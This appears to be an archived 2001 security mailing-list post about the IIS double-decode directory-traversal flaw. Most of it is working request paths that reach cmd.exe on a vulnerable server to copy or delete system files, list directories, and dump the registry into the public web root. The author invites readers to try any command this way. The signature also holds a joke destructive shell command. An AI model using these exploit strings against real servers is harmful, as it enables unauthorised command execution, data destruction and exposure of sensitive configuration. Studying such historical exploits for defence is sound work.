I've tried vairous combinations myself. You can call any vaild cmd.exe DOS
command. Example:
Copy:
scripts/..%25%35c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\xcopy.e
xe+c:\Mycopy.exe
Delete:
scripts/..%25%35c../winnt/system32/cmd.exe?/c+del+c:\winnt\system32\xcopy.ex
e+c:\Mycopy.exe
Dir with /w
scripts/..%25%35c../winnt/system32/cmd.exe?/c+dir+/w
Here's a cool one: Dump the registry to a text file and view from web... :)
scripts/..%25%35c../winnt/system32/cmd.exe?/c+regedit+/e+c:\inetpub\wwwroot\
registry.txt
When executing the cmd.exe through IIS, you only have a one shot. However,
when you are in the DOS Shell, you have the advantage of the Shell to parse
your command lines.
Ie.
>dir /w | cmd
You will not be able to memic this through IIS, due to the absence of the
DOS Shell.
my 2 cents.
______
/_____/\ Harry Steinmeyer
/____ \\ \ Senior Programmer
/_____\ \\ / Winn-Dixie, Inc.
/_____/ \/ / /
/_____/ / \//\ rm -rf /bin/laden
\_____\//\ / /
\_____/ / /\ /
\_____/ \\ \
\_____\ \\
\_____\/
"Science without religion is lame, religion without science is blind."
Einstein, Albert (1879-1955)
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Wed Oct 24 2001 - 14:31:50 PDT